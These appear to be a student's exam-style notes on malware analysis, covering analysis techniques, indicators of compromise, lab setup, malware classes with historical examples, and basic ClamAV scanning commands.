UNIT-1

1.What is malware analysis? Explain various malware tools and techniques.

What is Malware Analysis?
Malware Analysis is the study or process of determining the functionality, origin and potential impact of a
given malware sample and extracting as much information from it. The information that is extracted helps
to understand the functionality and scope of malware, how the system was infected and how to defend
against similar attacks in future.

Objectives:
• To understand the type of malware and its functionality.
• Determine how the system was infected by malware and define if it was a targeted attack or a
phishing attack.
• How malware communicates with attacker.
• Future detection of malware and generating signatures.

Various Malware Tools and Techniques:

1. Static Analysis Tools and Techniques:
Static analysis involves examining the malware without executing it. The goal is to understand the
malware's structure, code, and potential behaviors. Some static analysis tools and techniques include:
• Disassemblers: Disassemblers convert the machine code (binary) of the malware into human
readable assembly code. This allows analysts to understand the instructions executed by the
malware.
• Decompilers: Decompilers translate the binary code into higher-level programming languages,
such as C or C++. This helps in understanding the malware's logic and functionality at a more
abstract level.
• Strings Analysis: Extracting and analyzing strings present in the malware, which might reveal
important information like URLs, commands, or encryption keys used by the malware.
• PE Analysis Tools: For Windows executable files (PE files), PE analysis tools can extract
metadata, imports, exports, and other information from the malware's header.
2. Dynamic Analysis Tools and Techniques:
Dynamic analysis involves executing the malware in a controlled environment to observe its behavior
during runtime. This provides valuable insights into the malware's actions and interactions with the system.
Some dynamic analysis tools and techniques include:
• Sandboxing: Sandboxes are isolated environments where malware can be executed safely. This
allows analysts to observe the malware's behavior without risking the host system
• Behavioral Analysis: Observing and documenting the actions and interactions of the malware with
the system, such as file modifications, registry changes, network communication, and processes
created.
 • API Hooking: Intercepting and monitoring the application programming interfaces (APIs) used by
the malware to understand its interactions with the operating system.
• Network Traffic Analysis: Capturing and analyzing the network communications initiated by the
malware to identify communication protocols, command-and-control (C2) servers, and data
exfiltration attempts.
• Dynamic Code Analysis: Techniques like run-time debugging allow analysts to monitor the
execution of the malware step-by-step and inspect memory and CPU states.
3. Memory Analysis Tools and Techniques:
Memory analysis focuses on examining artifacts and payloads present in the system's memory.
This is especially useful for detecting file-less malware or malware that operates primarily in-
memory. Some memory analysis tools and techniques include:
• Memory Dumping: Extracting the contents of the system's memory for offline analysis, which
may reveal hidden or encrypted payloads and other memory-resident artifacts.
• Process Injection Analysis: Identifying and analyzing code injection techniques used by malware
to hide its presence or escalate privileges.
• Malicious Code Hunting: Searching for signs of malicious code and suspicious data structures
within the memory of a compromised system.
4. Hybrid Analysis:
Hybrid analysis combines aspects of static and dynamic analysis to gain a more comprehensive
understanding of the malware. This approach provides a broader view of the malware's behavior,
capabilities, and evasion techniques.
5. Automated Analysis Tools:
Automated analysis tools allow analysts to quickly analyze large volumes of malware samples. These
tools can execute malware in a sandboxed environment, generate reports, and extract IOCs automatically.
Some popular malware analysis tools include:
• IDA Pro: An interactive disassembler and debugger widely used for static analysis.
• Ghidra: An open-source software reverse engineering framework developed by the NSA.
• Cuckoo Sandbox: An open-source automated malware analysis system.
• Wireshark: A network protocol analyzer used for network traffic analysis.
• Volatility: A popular memory analysis framework for examining memory artifacts.
• YARA: A pattern matching tool used for creating and sharing malware signatures.

2. Explain about Malware indicators of comprise.

Malware indicators are characteristics or patterns that may suggest the presence of malware (malicious
software) on a computer system or network. These indicators help cybersecurity professionals and
systems detect and identify potential threats. Here are common malware indicators:

1.Unusual Network Traffic:

An increase in network traffic, especially to suspicious or unknown IP addresses.
Unusual data transfer patterns or large amounts of data being sent to external servers.
2.Unexpected System Behaviour:
Unusual system slowdowns, freezes, or crashes.
Unexplained changes in system settings or configurations.
Unexpected reboots or system shutdowns.
3.Anomalous File Activity:
Unusual file modifications, creations, or deletions.
Files with unexpected or suspicious names.
Changes to critical system files or directories.
4.Unusual Registry Changes:
Unauthorized modifications to the Windows Registry.
Creation or modification of registry keys associated with auto-start functionality.
5.Abnormal Process Activity:
Unknown or suspicious processes running in the background.
Processes attempting to access sensitive system resources or perform unauthorized actions.
6.Unexpected System Connections:
Outbound connections to known malicious IP addresses.
Connections to command and control servers used by malware.
7.Antivirus or Security Alerts:
Alerts from antivirus or security software indicating the presence of malicious files or behaviour.
Frequent detections of malware signatures.
8.Unusual Login Activity:
Multiple failed login attempts or unauthorized access.
Login attempts from unusual locations or devices.
9.Changes in System Logs:
Alterations to system logs to hide malicious activities.
Monitoring and analysing log files for anomalies.
10.Malicious Payload Detection:
Identifying and analysing malicious files or code within the system.
Recognition of known malware signatures or patterns.
11.Behavioural Anomalies:
Monitoring for deviations from normal user behaviour or system activity.
Unusual patterns in user access times, file access, or data transfers.
12.Memory Exploitation:
Detection of memory-based attacks, such as buffer overflows or injection attacks.
Monitoring for unexpected changes in memory usage.
13.DNS Request Anomalies:
Unusual patterns in DNS requests, such as multiple failed requests or requests to known malicious domains.
DNS tunnelling techniques used by malware.
Security professionals use a combination of these indicators to implement intrusion detection and
prevention systems, conduct malware analysis, and enhance overall cybersecurity measures. Regular
monitoring and timely response to these indicators are crucial for mitigating the impact of malware attacks.

3.What are the types of malware analysis and explain in detail?

What is Malware Analysis?

Malware Analysis is the study or process of determining the functionality, origin and potential impact of a

given malware sample and extracting as much information from it. The information that is extracted helps

to understand the functionality and scope of malware, how the system was infected and how to defend

against similar attacks in future.

Types of Malware Analysis:

1. Static Analysis:

Static analysis involves examining the malware without actually executing it. Analysts dissect the code
and structure of the malware to gain insights into its inner workings. Techniques used in static analysis
include:
Code Review: Manually examining the source code of the malware to identify suspicious or malicious
functions, APIs, and behaviors.
Disassembling and Decompiling: Transforming the binary code into human-readable assembly
language (disassembling) or higher-level programming language (decompiling) to better understand the
code's functionality.
Strings Analysis: Extracting and analyzing strings present in the malware, which might reveal indicators
of compromise (IOCs), such as command-and-control (C2) server URLs or encryption keys.
Signature-based Detection: Creating signatures or patterns based on known malware characteristics to
detect and block similar malware in the future.
2. Dynamic Analysis:
 Dynamic analysis involves executing the malware in a controlled environment, such as a virtual
machine (VM), and observing its behavior during runtime. Techniques used in dynamic analysis include:
Sandboxing: Running the malware in an isolated and controlled environment to monitor its actions, such
as file modifications, network communication, and process creation.
Behavioral Analysis: Observing and documenting the actions and interactions of the malware with the host
system and other processes to understand its capabilities and intentions.
API Hooking: Intercepting and monitoring the application programming interfaces (APIs) used by the
malware to gain insight into its actions and interactions with the operating system.
Network Traffic Analysis: Capturing and analyzing the network communications initiated by the malware
to identify communication protocols, C2 servers, and data exfiltration attempts.
3. Memory Analysis:
Memory analysis focuses on examining the malware's activities and artifacts present in the system's
memory. This is particularly useful for detecting and analyzing fileless malware or malware that operates
primarily in-memory. Techniques used in memory analysis include:
Memory Dumping: Extracting the contents of the system's memory for offline analysis to identify hidden
or encrypted payloads and other memory-resident artifacts.
Process Injection Analysis: Identifying and analyzing code injection techniques used by malware to
hide its presence or escalate privileges.
Malicious Code Hunting: Searching for telltale signs of malicious code and suspicious data structures
within the memory of a compromised system.
4. Hybrid Analysis:
Hybrid analysis combines aspects of static and dynamic analysis to gain a more comprehensive
understanding of the malware. This approach provides a broader view of the malware's behavior,
capabilities, and evasion techniques.
5. Reverse Engineering:
Reverse engineering involves deconstructing the malware to understand its logic and functionality
fully. It is a crucial process in understanding advanced or previously unknown malware. Analysts may
use various tools and techniques, such as disassemblers, debuggers, and other specialized software to
reverse engineer the malware code.
6. Automated Analysis:
Automated analysis relies on security tools and systems to quickly analyze large volumes of malware
samples. These tools can execute malware in a sandboxed environment, generate reports, and extract IOCs
automatically.

By employing a combination of these malware analysis techniques, cyber security experts can better
understand the threat posed by malware, devise appropriate countermeasures, and develop better informed
incident response strategies.
4.Explain in detail about reverse engineering and resources for reverse engineering malware.
What Is Reverse Engineering Malware?
 Reverse engineering malware is the process of analyzing malware to understand its functionality and
purpose. This process can determine how to remove the malware from a system or create defenses against
it.
Reverse engineering malware is challenging, as malware is often designed to be difficult to analyze.
Typically, a malware reverse engineering program would be necessary to become proficient at it. Threat
actors may use obfuscation techniques, encryption, and other tricks to make the programs more complex.
In addition, malware authors may change the code frequently to make it harder to reverse engineer.

When Should You Reverse Engineer Malware?

Reverse engineering is a critical part of understanding and combating malware. When malware is discovered,
the first thing that security researchers want to know is how it works.

However, simply understanding how malware works isn’t enough to protect against it. To be truly effective,
security researchers need to be able to not only understand how malware works but also predict how it will
evolve.
Security researchers must have a strong understanding of assembly language and computer architecture to
reverse engineer malware. Assembly language is the lowest level of programming language, and it’s used
to write programs that are very close to the hardware. This makes it ideal for writing malware, as it gives
the attacker much control over what the code does.
Computer architecture is the study of how computers are designed and how they work. By understanding
computer architecture, security researchers can better understand how malware works and how it can be
used to attack systems.

What Are the Steps of Reverse Engineering?

When it comes to reverse engineering, six steps are generally followed to successfully carry out the process:
1. Acquire a sample of the malware by downloading it from the internet or receiving it from someone
else.
2. Obtain a disassembler or decompiler. Many different programs can be used for this purpose.
3. Use the disassembler or decompiler to analyze the code of the malware. This will help you
understand how the malware works and what it does.
4. Create a sandbox environment, which is a safe place where you can run the malware to see what it
does without risking infecting your computer.
5. Run the malware in the sandbox environment and observe its behavior.
6. Generate a report of your findings. This will help you communicate your results to others who may
be interested in reverse engineering the malware.
Resources for Reverse Engineering Malware:
1. Online Courses and Tutorials:
- Platforms like Coursera, Udemy, and Cybrary offer courses on reverse engineering and malware analysis.
- Websites such as Malware Analysis Tutorials provide free resources and tutorials on reverse engineering
malware.
2. Books and Publications:
 - Books like "Practical Malware Analysis" by Michael Sikorski and Andrew Honig, and "The Art of Memory
Forensics" by Michael Hale Ligh, Andrew Case, and Jamie Levy provide comprehensive insights into reverse
engineering and malware analysis.
3. Training Labs and Challenges:
- Platforms like Hack The Box, TryHackMe, and CTFTime host capture-the-flag (CTF) challenges and
labs focused on reverse engineering and malware analysis.
4.Online Communities and Forums:
- Engage with communities such as Reddit's r/ReverseEngineering, MalwareTips Forums, and the
Reverse Engineering Discord server to seek guidance, share experiences, and collaborate with other
enthusiasts.
5. Conferences and Workshops:
- Attend cybersecurity conferences such as DEF CON, Black Hat, and RSA Conference, which often
feature presentations, workshops, and training sessions on reverse engineering and malware analysis.
6. Open-Source Tools and Projects:
- Explore open-source tools and projects like Ghidra, REMnux, Volatility, and YARA, which are widely
used in the reverse engineering and malware analysis community.
7. Vendor Documentation and Resources:
- Check vendor websites and documentation for resources on reverse engineering malware targeting
their products or platforms.
- Many security vendors offer whitepapers, case studies, and technical articles on malware analysis and
threat intelligence.
8. Research Papers and Journals:
- Review academic research papers, journals, and conference proceedings in the field of cybersecurity,
malware analysis, and reverse engineering for in-depth insights and novel techniques.
By leveraging these resources and applying systematic reverse engineering methodologies, analysts can
effectively dissect and understand the behavior of malware, thereby enhancing their ability to detect, analyze,
and mitigate cyber threats.

5. Difference between behavioral analysis Vs Code analysis.

BEHAVIOURAL ANALYSIS VS. CODE ANALYSIS

Behavioral Analysis and Code Analysis are two distinct approaches used in malware analysis to understand
and dissect malicious software. Here are the key differences between these two methods:

Behavioral Analysis:
1. Focus: Behavioral analysis concentrates on observing and documenting the actions and interactions of
malware with the target system during runtime.
2. Execution Environment: The malware is executed in a controlled environment, such as a sandbox or
virtual machine, to observe its behavior without affecting the host system.
3. Observations: Analysts look for various activities performed by the malware, such as file modifications,
network communications, registry changes, process creations, and attempts to escalate privileges.

4. Advantages:
• Provides a real-world perspective of how the malware behaves on an actual system.
• Useful for identifying new and unknown malware that may not have specific signatures.
• Helps reveal evasive behavior, such as self-destruct mechanisms and anti-analysis techniques.

5. Limitations:
• Cannot provide insights into the internal code structure and logic of the malware.
• May miss certain aspects of malware behavior that require deep analysis of the code.

Code Analysis:
1. Focus: Code analysis involves examining the malware's binary code, assembly language, or source code
to understand its internal structure, logic, and functionality.
2. Execution Environment: Code analysis is typically conducted in a static environment without executing
the malware. The analysis focuses on studying the code's attributes without running it on a live system.
3. Observations: Analysts review the assembly language or decompiled code to identify instructions,
functions, data structures, and potential vulnerabilities.

4. Advantages:
• Provides a deep understanding of the malware's logic and functionality.
• Helps identify specific techniques used by the malware, such as encryption, packing, or code injection.
• Useful for generating detection signatures and understanding the full extent of the malware's capabilities.

5. Limitations:
• Cannot capture dynamic behaviors of the malware that may occur during runtime.
• May miss evasive techniques that are only observable in a live execution environment.

Combining Behavioral and Code Analysis:

Both behavioral and code analysis complement each other, and combining these approaches can provide a
more comprehensive view of the malware. By leveraging both techniques, analysts can:
• Observe the malware's behavior during runtime to understand its real-world impact on the target system.
• Extract IOCs (Indicators of Compromise) from the behavioral analysis to identify the presence of malware
on other systems.
• Use code analysis to gain a detailed understanding of the malware's internal mechanisms, capabilities, and
possible evasion techniques.
• Develop signatures and rules based on code analysis to enhance detection capabilities.
 Ultimately, a holistic approach that integrates behavioral and code analysis, along with other
malware analysis techniques, allows cybersecurity professionals to effectively combat sophisticated and
evolving threats.
OR

6.Discuss the limitations of signature -based malware detection.

Signature-based malware detection, while effective in many cases, also comes with several limitations that
can be exploited by malware developers to evade detection. Here are some key limitations:
1. Dependency on Known Signatures:
- Signature-based detection relies on identifying specific patterns or signatures that are associated with known
malware variants.
- New or modified malware that does not match existing signatures can easily evade detection by signaturebased
systems.
2. Inability to Detect Polymorphic Malware:
- Polymorphic malware employs techniques to mutate its code while preserving its functionality, making it
difficult to detect using static signatures.
- Each instance of polymorphic malware may have a unique signature, rendering traditional signature-based
detection ineffective.
3. Limited Coverage:
- Signature-based detection systems are only effective against malware for which signatures have been created
and updated.
- Emerging or zero-day threats that have not yet been identified and added to signature databases can bypass
detection.
4. Overhead of Signature Management:
- Maintaining a comprehensive database of malware signatures requires significant resources and effort.
- Constant updates are necessary to keep up with the evolving threat landscape, which can lead to delays in
detecting new threats.
5.False Positives and False Negatives:
- Signature-based detection may produce false positives (incorrectly identifying benign software as malware)
or false negatives (failing to detect actual malware).
- False positives can lead to unnecessary alarm and disruption, while false negatives pose a serious security risk
by allowing malware to go undetected.
6. Easy Signature Obfuscation:
- Malware authors can easily obfuscate their code to evade signature-based detection.
- Techniques such as code encryption, packing, and obfuscation can alter the appearance of malware binaries,
making them unrecognizable to signature-based scanners.
7.Limited Effectiveness Against Targeted Attacks:
- Signature-based detection is less effective against targeted attacks, where attackers tailor their malware
specifically to evade detection by known security measures.
- Targeted malware may be designed to evade signature-based detection by employing sophisticated evasion
techniques or zero-day vulnerabilities.
8. Performance Overhead:
- Scanning every file or network packet for signatures can impose a significant performance overhead,
especially in high-throughput environments.
- The need to scan for signatures in real-time may introduce latency and impact system performance.
To overcome the limitations of signature-based detection, organizations often employ a multi-layered
approach to cybersecurity, integrating other detection techniques such as behavior-based analysis, anomaly
detection, machine learning, and threat intelligence feeds. By combining multiple detection methods,
organizations can improve their ability to detect and mitigate a broader range of threats, including those
that evade signature-based detection.

7.Discuss the importance of setting up a controlled environment for reverse engineering

malware.

BRIEF OVERVIEW OF MALWARE ANALYSIS LAB SETUP AND

CONFIGURATION
A lab setup for malware analysis typically includes the following components:
1. Virtual Machines: Virtual machines are used to isolate the malware and prevent it from causing
harm to the host system.
2. Analysis Tools: Tools such as antivirus software, sandboxing tools, and disassemblers are used to
analyse the behaviour of malware and understand its functionality.
3. Networking: A virtual network is used to simulate a real-world environment, allowing the malware
to communicate with other systems and allowing the analyst to observe its behaviour.
 4. Storage: A large storage device is used to store the malware samples and analysis data.
5. Monitoring Tools: Monitoring tools such as network sniffers and process monitors are used to
track the behaviour of malware and collect data for analysis.
6. Backup System: A backup system is used to ensure that the analysis environment can be quickly
restored if it becomes compromised or unstable.
7. Documentation: Documentation is important for keeping track of the analysis process and for
sharing information with others who may be involved in the analysis.

It’s important to note that a malware analysis lab must be designed and managed with security in mind.
Access to the lab should be restricted, and all tools and systems used in the lab should be kept up-to-date
and regularly reviewed to ensure that they are secure.
Threats are one of the most challenging areas in the field of Information security and the lack of qualified
personnel makes it even harder for companies to keep their information and assets secure and cater to such
a situation without incurring much loss. Malware analysis is the process of determining the origin, potential
impact, and functionality of the given malware sample such as virus, trojan horse, etc. In this article, we are
not going to discuss the whereabouts of Malware or Malware Analysis. Rather we will see How can you
effectively set up a lab for Malware Analysis. As one plan can not fit the need of all the organizations, we
need to take into mind a few alternatives and decide the best according to your organization’s needs.

Why do we need Malware Analysis Lab?

Malware Analysis Lab can help you in any of the following ways:
• It will increase your analysis speed.
• A suitable environment will build a framework and identify TTP and IOC.
• A malware analysis lab will help you to get control of what gets in and out of the network.
• It will decrease the risk of infection.

Steps for setting up Malware Analysis Lab

To set up the Malware Analysis Lab, follow the points mentioned below.
1. Network: One of the most important and the first step in setting up a lab is to define its network. Here
are a few reasons why this step is important:
• You need to have information about your network to identify uncommon patterns and uncommon
connection attempts.
• You need to know about what is going in and what is going out of the network.
• You need to intercept traffic between your Analysis system and the Network.
• You need to isolate the analysis system from other computers.
Choose your favorite private network address spaces so you assign static IP addresses to each one of your
systems. The reason for this allotment is that when you start collecting Network information and you will
spend most of your time trying to figure out which systems did that belong to if you don’t make a list.
You’re also going to need a dedicated machine to control your network traffic and to act as a gateway for
your lab. REMnux and Kali are two options that you can consider for your gateway.
2. Virtualization: Virtualization software is required in either of the following scenarios:
 • When you don’t have a few spare machines, a switch, and a dedicated physical space for this.
• You simply want to carry your Lab with you whenever you go.
There are few options for Virtualisation software like VMWare, Qemu, Virtual Box (free), and if you don’t
mind spending a few bucks then you can go for VMWare Workstation. Virtualization software will allow
you to host your entire lab in a single machine and they provide another interesting feature i.e. snapshots.
Snapshots allow you to revert the state of your machines to a clean state, so you can start an analysis over
and over again. These are quite useful for keeping track of your work on long analysis. If you are using
Virtualization Software, how you set up your virtual network is very important. You have three options for
this:
• Bridged: Do not use Bridged mode, this can expose your network to threats, and you don’t want
to infect anybody else systems.
• NAT: This is the ideal choice. Disable DHCP so you can stick to your design.
• Host-Only: Host-Only will only communicate your virtual system with your host machine, you
don’t want this either.
3. Analysis Machines: If you are going to do Malware Analysis, then you will need a variety of systems to
run your samples, Execute your tools, and do Static and Dynamic Analysis. You will have to follow the
following simple steps to set up each one of the systems that you choose.
• Install the Operating System and install the Security Updates.
• Install Virtual Machine Tools(optional).
• Install Analysis Tools and for Windows, you can check Flare VM tools to automate some of this
task.
• Set up Network Configuration.
• Save a Snapshot in a clear state.
4. Testing your Environment: Before starting with the analysis, you need to make sure that everything is
perfect and working fine. For this you need to check the following things:
• Make sure no analysis machine has access to the Internet or your home/ work network. You can
control this with a Gateway. Try turning it ON and OFF so that you can get familiar with the
process.
• Turn all your machines ON and try running a network scan to see that everything is working
properly.
• It is very important to make sure that all your machines have a Snapshot in a clear state. You
should have clear rules and definitions stating how often you will update them to install security
patches, new software versions, and other caveats.

8.Explain in detail about malware classification.

Malware Classification:
Malware, short for malicious software, refers to any software intentionally designed to cause damage, steal
data, or gain unauthorized access to computer systems or networks. Malware can take various forms and
exhibit different behaviors, leading to the classification of malware into several categories. Here are some
common classifications of malware:
1. Ransomware
Ransomware is software that uses encryption to disable a target’s access to its data until a ransom is paid.
The victim organization is rendered partially or totally unable to operate until it pays, but there is no
guarantee that payment will result in the necessary decryption key or that the decryption key provided will
function properly. Example of a ransom letter:
Ransomware Example:
This year, the city of Baltimore was hit by a type of ransomware named RobbinHood, which halted all
city activities, including tax collection, property transfers, and government email for weeks. This attack
has cost the city more than $18 million so far, and costs continue to accrue. The same type of malware was
used against the city of Atlanta in 2018, resulting in costs of $17 million.
2. Fileless Malware

Fileless malware doesn’t install anything initially, instead, it makes changes to files that are native to the
operating system, such as PowerShell or WMI. Because the operating system recognizes the edited files
as legitimate, a fileless attack is not caught by antivirus software — and because these attacks are stealthy,
they are up to ten times more successful than traditional malware attacks.

Fileless Malware Example:

Astaroth is a fileless malware campaign that spammed users with links to a .LNK shortcut file. When users
downloaded the file, a WMIC tool was launched, along with a number of other legitimate Windows tools.
These tools downloaded additional code that was executed only in memory, leaving no evidence that could
be detected by vulnerability scanners. Then the attacker downloaded and ran a Trojan that stole credentials
and uploaded them to a remote server.

3. Spyware

Spyware collects information about user’s activities without their knowledge or consent. This can include
passwords, pins, payment information and unstructured messages.
The use of spyware is not limited to the desktop browser: it can also operate in a critical app or on a mobile
phone.
Even if the data stolen is not critical, the effects of spyware often ripple throughout the organization as
performance is degraded and productivity eroded.

Spyware Example:
DarkHotel, which targeted business and government leaders using hotel WIFI, used several types of
malware in order to gain access to the systems belonging to specific powerful people. Once that access
was gained, the attackers installed keyloggers to capture their targets passwords and other sensitive
information.
4. Adware

Adware tracks a user’s surfing activity to determine which ads to serve them. Although adware is similar
to spyware, it does not install any software on a user’s computer, nor does it capture keystrokes.

The danger in adware is the erosion of a user’s privacy — the data captured by adware is collated with data
captured, overtly or covertly, about the user’s activity elsewhere on the internet and used to create a profile
of that person which includes who their friends are, what they’ve purchased, where they’ve travelled, and
more. That information can be shared or sold to advertisers without the user’s consent.
Adware Example:
 Adware called Fireball infected 250 million computers and devices in 2017, hijacking browsers to change
default search engines and track web activity. However, the malware had the potential to become more than
a mere nuisance. Three-quarters of it was able to run code remotely and download malicious files.
5. Trojan
A Trojan disguises itself as desirable code or software. Once downloaded by unsuspecting users, the
Trojan can take control of victims’ systems for malicious purposes. Trojans may hide in games, apps, or
even software patches, or they may be embedded in attachments included in phishing emails.

Trojan Example:
Emotet is a sophisticated banking trojan that has been around since 2014. It is hard to fight Emotet because
it evades signature-based detection, is persistent, and includes spreader modules that help it propagate. The
trojan is so widespread that it is the subject of a US Department of Homeland Security alert, which notes
that Emotet has cost state, local, tribal and territorial governments up to $1 million per incident to remediate.
TrickBot malware is a type of banking Trojan released in 2016 that has since evolved into a modular,
multi-phase malware capable of a wide variety of illicit operations.

6. Worms
Worms target vulnerabilities in operating systems to install themselves into networks. They may gain
access in several ways: through backdoors built into software, through unintentional software
vulnerabilities, or through flash drives. Once in place, worms can be used by malicious actors to launch
DDoS attacks, steal sensitive data, or conduct ransomware attacks.

Worm Example:
Stuxnet was probably developed by the US and Israeli intelligence forces with the intent of setting back
Iran’s nuclear program. It was introduced into Iran’s environment through a flash drive.
Because the environment was air-gapped, its creators never thought Stuxnet would escape its target’s
network — but it did. Once in the wild, Stuxnet spread aggressively but did little damage, since its only
function was to interfere with industrial controllers that managed the uranium enrichment process.

7. Virus
A virus is a piece of code that inserts itself into an application and executes when the app is run. Once
inside a network, a virus may be used to steal sensitive data, launch DDoS attacks or conduct ransomware
attacks.
8. Rootkits

A rootkit is software that gives malicious actors remote control of a victim’s computer with full
administrative privileges. Rootkits can be injected into applications, kernels, hypervisors, or firmware. They
spread through phishing, malicious attachments, malicious downloads, and compromised shared drives.
Rootkits can also be used to conceal other malware, such as keyloggers. Rootkit
Example:
Zacinlo infects systems when users download a fake VPN app. Once installed, Zacinlo conducts a security
sweep for competing malware and tries to remove it. Then it opens invisible browsers and interacts with
content like a human would — by scrolling, highlighting and clicking. This activity is meant to fool
behavioural analysis software. Zacinlo’s payload occurs when the malware clicks on ads in the invisible
browsers. This advertising click fraud provides malicious actors with a cut of the commission.
9. Keyloggers
A keylogger is a type of spyware that monitors user activity. Keyloggers have legitimate uses; businesses
can use them to monitor employee activity and families may use them to keep track of children’s online
behaviors.
However, when installed for malicious purposes, keyloggers can be used to steal password data, banking
information and other sensitive information. Keyloggers can be inserted into a system through phishing,
social engineering or malicious downloads. Keylogger Example:
keylogger called Olympic Vision has been used to target US, Middle Eastern and Asian businessmen
for business email compromise (BEC) attacks. Olympic Vision uses spear-phishing and social
engineering techniques to infect its targets’ systems in order to steal sensitive data and spy on business
transactions. The keylogger is not sophisticated, but it’s available on the black market for $25 so it’s highly
accessible to malicious actors.

10. Bots/Botnets

A bot is a software application that performs automated tasks on command. They’re used for legitimate
purposes, such as indexing search engines, but when used for malicious purposes, they take the form of
self-propagating malware that can connect back to a central server.

Usually, bots are used in large numbers to create a botnet, which is a network of bots used to launch broad
remotely-controlled floods of attacks, such as DDoS attacks. Botnets can become quite expansive. For
example, the Mirai IoT botnet ranged from 800,000 to 2.5M computers.

Botnet Example:
Echobot is a variant of the well-known Mirai. Echobot attacks a wide range of IoT devices, exploiting
over 50 different vulnerabilities, but it also includes exploits for Oracle WebLogic Server and VMWare’s
SD-Wan networking software. In addition, the malware looks for unpatched legacy systems. Echobot could
be used by malicious actors to launch DDoS attacks, interrupt supply chains, steal sensitive supply chain
information and conduct corporate sabotage.

9.What is clamav? Explain it's role in malware analysis.

ClamAV is an open-source antivirus engine designed primarily for detecting malicious software, including
viruses, malware, and other threats. It operates on various platforms including Unix, Linux, macOS, and
Windows. Originally developed by Tomasz Kojm in 2001, ClamAV has become a widely used tool for both
individual users and enterprises seeking to protect their systems from malicious software.

ClamAV works by scanning files and directories on a system for signatures and patterns that match known
malware. These signatures are essentially fingerprints or unique identifiers of specific malware strains. When
ClamAV encounters a file, it compares its content against a database of these signatures. If a match is found,
it signals the presence of malware, allowing the user to take appropriate action, such as quarantining or deleting
the infected file.
 In addition to signature-based detection, ClamAV also incorporates heuristic analysis techniques to identify
potentially suspicious behavior or code patterns. This enables it to detect previously unknown or "zero-day"
threats that haven't yet been added to its signature database.

In the context of malware analysis, ClamAV can be utilized as one component of a broader toolkit. Analysts
may use it to quickly scan suspicious files or directories for known malware, providing a baseline assessment
of potential threats. However, it's important to note that ClamAV, like any antivirus solution, may not catch all
types of malware, especially newly emerging or custom-built threats. Therefore, it's often used in conjunction
with other malware analysis tools and techniques, such as sandboxing, static and dynamic analysis, and
behavioral analysis, to comprehensively assess and understand the nature of the malware

Role in Malware Analysis:

Detection: ClamAV identifies malicious files by comparing them against a database of known malware
signatures.
On-Access Scanning: ClamAV can block file access until a file is scanned, preventing potential threats.

Scanning Archives: It examines files within compressed archives (e.g., ZIP, RAR, 7Zip) to detect hidden
malware.
Executable File Parsing: ClamAV analyzes Windows PE files (32/64-bit) and other executable formats.
Support for Special Files: It handles diverse formats like Microsoft Office documents, SymbianOS packages,
and more.
Malware Prevention: ClamAV helps prevent malware from spreading via e-mails or other file transfers¹.

10.Explain some basic ClamAV commands and their usage. Explain different types of
signatures.

1. Install ClamAV:
• If you haven't already installed ClamAV, you can do so using your package manager. For
example, on Ubuntu or Debian-based systems, you can install ClamAV using the following
command: arduinoCopy code sudo apt-get install clamav
• Follow the prompts to complete the installation.
2. Update Virus Definitions:
• Before scanning for malware, it's essential to ensure that your virus definitions are up to date.
Update the virus database using the freshclam command: Copy code sudo freshclam
• This command updates the virus signatures to the latest available version.
3. Perform a Scan:
• Once the virus database is updated, you can perform a scan on a specific file, directory, or the
entire system. For example, to scan a specific directory (replace /path/to/directory with the actual
directory path): bashCopy code clamscan /path/to/directory
• ClamAV will scan the specified directory for malware and display the results.
4. View Scan Report:
• After the scan completes, ClamAV will generate a report showing the scan results,
including any detected malware. You can view the report directly in the terminal. If you want to
save the report to a file, you can redirect the output to a text file. For example:
bashCopy code
clamscan /path/to/directory > scan_report.txt
• This command will save the scan report to a file named scan_report.txt in the current
directory.
5. Scan Options:
 ClamAV provides various options to customize the scanning process. You can
specify additional options such as recursively scanning subdirectories, ignoring specific file
types, or outputting only infected files. Refer to the ClamAV documentation or use the
clamscan --help command to view available options.
6. Schedule Regular Scans:
• To ensure ongoing protection against malware, you can schedule regular scans using cron or
another scheduling tool. For example, you can create a cron job to run ClamAV scans daily or
weekly and email the results to the system administrator for review.
That's it! You've completed a basic demonstration of ClamAV commands and usage. Remember to
regularly update virus definitions and perform scans to maintain a secure system.

Types of Signatures:
MD5 Signatures: These signatures are based on the MD5 hash values of known malware files. MD5
signatures are effective for identifying exact matches of known malware samples.
SHA-1 and SHA-256 Signatures: Similar to MD5 signatures, SHA-1 and SHA-256 signatures are based on
cryptographic hash functions and are used to uniquely identify malware samples.
YARA Signatures: ClamAV also supports YARA rules, which are more flexible and expressive than
traditional signatures. YARA rules allow users to define complex patterns and conditions for identifying
malware based on various attributes such as file properties, strings, and byte sequences.